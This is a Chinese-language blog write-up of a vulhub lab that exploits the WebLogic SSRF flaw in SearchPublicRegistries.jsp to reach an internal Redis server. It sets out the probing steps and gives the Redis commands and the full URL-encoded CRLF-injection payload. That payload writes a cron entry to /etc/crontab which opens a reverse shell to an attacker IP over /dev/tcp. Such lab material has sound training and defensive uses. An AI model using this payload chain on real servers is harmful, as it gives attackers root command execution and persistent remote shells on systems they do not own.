weblogic ssrf 攻击redis

Weblogic SSRF漏洞
一.环境搭建

app Weblogic path weblogic/ssrf

cd vulhub/weblogic/ssrf

docker-compose up -d

二.SSRF漏洞测试

1.SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`

2.burp抓包,点击Search进行抓包

在这里插入图片描述

①访问端口不开放则会显示 not connect over

在这里插入图片描述

②访问指定开放端口则返回带有404内容的提示

在这里插入图片描述

3.判断redis服务器

docker exec -it 23e908eaeb17 /bin/bash 进入容器查看 IP IP为172.21.0.2

docker ps 查看docker的ID 通过6379来判断是redis服务器的端口号

(docker环境的网段一般是172.*)

在这里插入图片描述

②探测redis服务器,发现172.21.0.2:6379可以连通

在这里插入图片描述

三.注入HTTP头,利用Redis反弹shell

1.发送三条redis命令,将弹shell脚本写入/etc/crontab

evil处改成反弹shell到kali的IP地址192.168.253.139

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.253.139/21 0>&1'\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

2.进行url编码

http://172.21.0.2:6379/aaa%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20’sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.253.139%2F21%200%3E%261’%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

4.将修改好的url编码放到operator中,nc 反弹成功,如图

在这里插入图片描述

在这里插入图片描述

JGg-1693874884437)]

[外链图片转存中…(img-VLCle0IL-1693874884437)]

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值